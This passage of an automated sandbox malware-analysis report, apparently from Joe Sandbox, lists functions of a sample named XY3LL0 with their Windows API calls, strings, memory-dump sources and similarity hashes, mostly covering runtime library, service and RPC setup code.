Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FF8FDF9712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF971B1
GetLastError.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF971BF
LoadLibraryExW.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF971E9
FreeLibrary.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF97257
GetProcAddress.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF97263

Strings

api-ms-, xrefs: 00007FF8FDF971D1

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: 0eb5d73f600c5741bf1af0106cc411f93941037330719db320321ea9ce4530cf
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: 66318222F2974199EB159B02A800D697394FF68BF0F594535DF3E467D0FE3CE4458681

Function 00007FF8FDF99444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF8FDF99453
FlsGetValue.KERNEL32 ref: 00007FF8FDF99468
FlsSetValue.KERNEL32 ref: 00007FF8FDF99489
FlsSetValue.KERNEL32 ref: 00007FF8FDF994B6
FlsSetValue.KERNEL32 ref: 00007FF8FDF994C7
FlsSetValue.KERNEL32 ref: 00007FF8FDF994D8
SetLastError.KERNEL32 ref: 00007FF8FDF994F3

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 91d06644c0741f813ec758f624db02b8260ec89bd824d1db143d58204be2a439
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: 8821CF22F0C2424DFB1AA7255D919791242DFA47F0F459734EB3F0BAD6FE2CA44082C2

Function 00007FF8FDFA0100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF8FDFA0131
GetLastError.KERNEL32 ref: 00007FF8FDFA013D
CloseHandle.KERNEL32 ref: 00007FF8FDFA0155
CreateFileW.KERNEL32 ref: 00007FF8FDFA0180
WriteConsoleW.KERNEL32 ref: 00007FF8FDFA019F

Strings

CONOUT$, xrefs: 00007FF8FDFA0161

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: 2e5a3d3794156196c661f62c89068d8ad55b78d3acbce99f7c4ac12db4b2a49f
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: D4118422718A418AE7508B52F844B6572A4FB98BF4F044234EB6E87BD4EF3CD5448784

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

10:52:57, xrefs: 000000014000120F
usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
Jul 5 2019, xrefs: 0000000140001216
Help, xrefs: 0000000140001238

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FF8FDF94CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF8FDF94E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8FDF9519B

Strings

csm, xrefs: 00007FF8FDF94E1B
csm, xrefs: 00007FF8FDF94DB9
csm, xrefs: 00007FF8FDF94E99

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 6c3b0907c4733b37e3b163070ed4c5bd4a44bc09ecf8fe361c5a58f2ae8dc713
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: 92E1B233D087828EE711AF24D840AAD37A0FB657A8F144136DB6E47795EF38E581C782

Function 00007FF8FDF995BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF995CB
FlsSetValue.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF99601
FlsSetValue.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF9962E
FlsSetValue.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF9963F
FlsSetValue.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF99650
SetLastError.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF9966B

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: 48ed77eb66c4089cb7dd65bf02b0bb453804b5748620e9098dc8bf3c56d2dcf8
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: 74118C22F0C2424EFB1867225D919792192DFA87F0F455335EB3F4B6D6FE2CA4418682

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FF8FDF97F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF8FDF97F4D
GetProcAddress.KERNEL32 ref: 00007FF8FDF97F63
FreeLibrary.KERNEL32 ref: 00007FF8FDF97F8A

Strings

CorExitProcess, xrefs: 00007FF8FDF97F5C
mscoree.dll, xrefs: 00007FF8FDF97F44

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: 1789af6cd5df49b8733819a301d2b35033ee5c2e6d48a4171d789643c2826bd6
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 8FF0A422B1870289EB148B24A844B796360EF547F4F441235CB7F455E8EF2CD045D3C0

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

CorExitProcess, xrefs: 000000014000852A
mscoree.dll, xrefs: 0000000140008518

Memory Dump Source

